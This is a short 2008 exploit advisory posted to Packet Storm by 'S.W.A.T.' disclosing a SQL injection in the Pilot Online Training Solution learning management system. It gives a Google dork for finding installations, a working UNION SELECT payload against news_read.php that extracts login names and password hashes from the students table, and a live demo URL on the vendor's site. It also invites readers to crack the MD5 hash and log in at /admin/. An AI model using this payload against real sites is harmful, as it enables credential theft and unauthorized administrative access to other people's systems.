pilotgroup-sql.txt

2008-09-29T00:00:00
ID PACKETSTORM:70436
Type packetstorm
Reporter S.W.A.T.
Modified 2008-09-29T00:00:00

Description

                                        
                                            `--==+================================================================================+==--  
--==+ Pilot Online Training Solution Remote SQL Injection Vulnerbility +==--  
--==+================================================================================+==--  
  
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
AUTHOR: S.W.A.T.  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
Site: http://www.elmspro.com/etraining/  
  
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
DORK (google): "Powered by PG Online Training Solution - learning management system"  
  
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
DESCRIPTION:  
You Can See Admin User & MD5 Password ..::.. Then Crack It & Login ;) :D  
  
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
EXPLOITS:  
www.site.com/news_read.php?id=-1/**/union/**/select/**/1,login,3,4,password,6,7,8,9/**/from/**/students/*  
  
Online Demo:  
http://www.elmspro.com/etraining/demo/news_read.php?id=-1/**/union/**/select/**/1,login,3,4,password,6,7,8,9/**/from/**/students/*  
  
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
NOTE/TIP:  
  
Admin Login Is At /admin/  
  
  
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
  
--==+================================================================================+==--  
--==+ Pilot Online Training Solution Remote SQL Injection Vulnerbility +==--  
--==+================================================================================+==--  
  
  
`